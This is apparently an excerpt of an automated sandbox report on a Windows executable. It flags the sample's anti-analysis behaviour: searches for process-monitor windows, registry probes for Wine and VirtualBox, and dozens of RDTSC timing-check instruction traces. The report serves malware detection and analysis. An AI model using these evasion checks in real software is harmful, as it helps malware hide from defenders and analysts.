                Source: file.exeStatic PE information: section name: entropy: 7.9437280014334295
                Source: file.exeStatic PE information: section name: cippurft entropy: 7.950859026244158

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9062 second address: 5F9068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9068 second address: 5F906C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F906C second address: 5F908E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79113F0796h 0x00000008 jmp 00007F79113F07A8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F908E second address: 5F9094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9094 second address: 5F909A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB4C4 second address: 5EB4D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F79111F4F02h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB4D1 second address: 5EB4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7FCF second address: 5F7FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F79111F4F03h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 jp 00007F79111F4EFEh 0x0000001a jo 00007F79111F4EF6h 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F7FFF second address: 5F8005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8005 second address: 5F8009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8415 second address: 5F8424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F79113F0796h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F86E7 second address: 5F8701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F79111F4EF6h 0x0000000a jbe 00007F79111F4EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8701 second address: 5F8707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F884F second address: 5F8892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F79111F4F05h 0x0000000c push edi 0x0000000d jmp 00007F79111F4EFAh 0x00000012 pop edi 0x00000013 jnc 00007F79111F4F02h 0x00000019 pushad 0x0000001a jnc 00007F79111F4EF6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC713 second address: 5FC779 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jno 00007F79113F0796h 0x00000011 pop ebx 0x00000012 popad 0x00000013 xor dword ptr [esp], 12D67B41h 0x0000001a mov dword ptr [ebp+122D18BAh], edx 0x00000020 mov dh, 7Ah 0x00000022 push 00000003h 0x00000024 or dh, 00000037h 0x00000027 push 00000000h 0x00000029 movsx esi, di 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F79113F0798h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 add edx, 520A8979h 0x0000004e push A77AE824h 0x00000053 jo 00007F79113F07A4h 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC779 second address: 5FC77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC77F second address: 5FC79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 188517DCh 0x0000000c push ebx 0x0000000d stc 0x0000000e pop esi 0x0000000f lea ebx, dword ptr [ebp+1245C4ADh] 0x00000015 sbb ch, 00000025h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC79D second address: 5FC7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FC91B second address: 5FC921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C00F second address: 61C014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C014 second address: 61C027 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F79113F0798h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b jo 00007F79113F0796h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A1F4 second address: 61A1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A1FA second address: 61A200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A7C5 second address: 61A7E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F79111F4F04h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A7E3 second address: 61A7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A7E9 second address: 61A813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F79111F4F01h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4F00h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A92F second address: 61A954 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F79113F07ACh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61A954 second address: 61A95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AC05 second address: 61AC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AD3B second address: 61AD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F79111F4EFDh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F79111F4F02h 0x00000011 jc 00007F79111F4EF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AD67 second address: 61AD94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F79113F0796h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F79113F07A0h 0x00000017 popad 0x00000018 jmp 00007F79113F079Ah 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AD94 second address: 61AD9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AD9A second address: 61AD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AF00 second address: 61AF0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61AF0A second address: 61AF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612F49 second address: 612F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F79111F4F08h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620B7E second address: 620B83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621E40 second address: 621E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621E44 second address: 621E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621E4A second address: 621E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F79111F4EFEh 0x0000000d jng 00007F79111F4EF6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623465 second address: 62346B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62346B second address: 623474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629AA4 second address: 629AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629AA8 second address: 629AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628EDD second address: 628EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F79113F079Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B8E3 second address: 62B908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F79111F4EFDh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F79111F4EFCh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BA67 second address: 62BA6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BCBA second address: 62BCBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BCBE second address: 62BCC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BDAC second address: 62BDB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C55C second address: 62C561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C561 second address: 62C567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C567 second address: 62C56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E857 second address: 62E869 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 je 00007F79111F4F00h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62FDFB second address: 62FE18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F07A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F17C second address: 62F182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631248 second address: 63124C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63124C second address: 63125B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6312E4 second address: 6312EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631CC8 second address: 631CEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79111F4EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79111F4F05h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63545C second address: 635474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F79113F0796h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F79113F0796h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635474 second address: 63547E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63547E second address: 6354E3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d sbb di, 4008h 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D2CAEh] 0x0000001a mov dword ptr [ebp+122D3244h], ecx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F79113F0798h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov bx, dx 0x0000003f xchg eax, esi 0x00000040 jng 00007F79113F07AAh 0x00000046 jnl 00007F79113F07A4h 0x0000004c push eax 0x0000004d push esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 pop esi 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630FE1 second address: 630FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630FE5 second address: 630FEF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63853B second address: 638541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638541 second address: 638599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79113F079Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F79113F07E4h 0x0000000f pushad 0x00000010 jmp 00007F79113F07A1h 0x00000015 jmp 00007F79113F079Eh 0x0000001a jmp 00007F79113F07A9h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638599 second address: 63859D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63859D second address: 6385A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63ABFF second address: 63AC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AC08 second address: 63AC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AC0E second address: 63AC1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79111F4EFCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638CDE second address: 638CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63AC1E second address: 63AC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638CE4 second address: 638CEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2A4 second address: 63B2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F79111F4EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2AE second address: 63B2C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F79113F0796h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2C1 second address: 63B2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2C5 second address: 63B2CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2CB second address: 63B2D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2D1 second address: 63B2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B2D5 second address: 63B2D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63B3D8 second address: 63B3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C334 second address: 63C338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63D1BB second address: 63D1C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C3EC second address: 63C409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79111F4F09h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63C409 second address: 63C40D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E1AA second address: 63E1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E1B2 second address: 63E1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F79113F079Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E1C3 second address: 63E1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F262 second address: 63F267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F267 second address: 63F2CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F79111F4EF6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f call 00007F79111F4EFBh 0x00000014 mov edi, dword ptr [ebp+122D395Eh] 0x0000001a pop ebx 0x0000001b push 00000000h 0x0000001d call 00007F79111F4F02h 0x00000022 or di, F500h 0x00000027 pop edi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F79111F4EF8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 movsx edi, dx 0x00000047 xchg eax, esi 0x00000048 pushad 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F2CC second address: 63F2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
